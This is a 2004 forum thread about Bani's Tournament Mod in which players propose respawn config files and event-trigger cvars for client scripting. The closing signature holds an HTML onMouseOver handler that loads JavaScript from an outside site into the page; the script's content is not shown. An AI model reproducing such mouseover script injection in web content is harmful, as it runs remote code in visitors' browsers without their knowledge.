suggestion: respawn_autoexec.cfg

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

squadjot

suggestion: respawn_autoexec.cfg

Post by squadjot »

I wrote about this before..but it was in another persons post..so..Bani..if u missed it,..here goes again, i would just like to hear ur opinion..

About scripting..and class/map_autoexec.cfg's ..its great... just ONE more little thing could be cool for scripters... a scriptfile (respawn_autoexec.cfg) that is executed somewhere between after u tapped out..and before u respawn.. that way u can ensure that ure scripting is setup right...

lets say u have some nade- or medic-script..or whatever..that maybe sets ur mouse1 to something temporarily... but if u then suddently get killed and respawn again...u might be set up wrongly..as u always spawn with weaponbank3... (and have not PUSHED a key to get to weaponbank3 and thereby it doesent get reset the way it was supposed to...)
coda'uk

Post by coda'uk »

hrm this is why i asked to have event triggers instead, like any action can get hooked into:

eg, on firing for effect raise an event and have an event handler 'on_FFE' that can be defined as:

set on_FFE "say_team FFE called, beware" or vstr something

all the client would have to do is a simple vstr on_FFE which won't have an effect if it is not pre-defined but should work if the user has it in their config.

maybe a b_usetriggers cvar may also help.

similarily, use your imagination, things like on_wounded (when lying dead), on_spawn, on_airstrike, on_upgrade (useful to let team mates know you have full revive or larger packs), on_charge (when fully charged bar), on_ammo, on_medpacks and so forth. would make so many things easier and it would be clientside so no additional server load.

i'd also like to see the ability to timestamp messages, like %t in messages to get substited for the mission time, or %s for mission seconds, which can then get combined with event triggers, like:

set on_FFE "say_team called FFE at %s seconds, keep away"
or have things like say_team enemy spawned at %s
Last edited by coda'uk on Thu Jul 01, 2004 6:59 am, edited 2 times in total.
squadjot

Post by squadjot »

yeah..great (i guess) if possible..
Kendle

Post by Kendle »

coda, that would be a fantastic solution :D (though leave it till after ET-TV please devs 8) )
Rain

Post by Rain »

My eventual plan was something quite similar to just that--have a few cvars that get tokens replaced in them. This would allow the people who want their configs in a different directory to easily do so (e.g. set on_classchange "exec scripts/class_%class%.cfg" or something) without eating loads of cvars.

It's planned, it just hasn't happened yet...
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>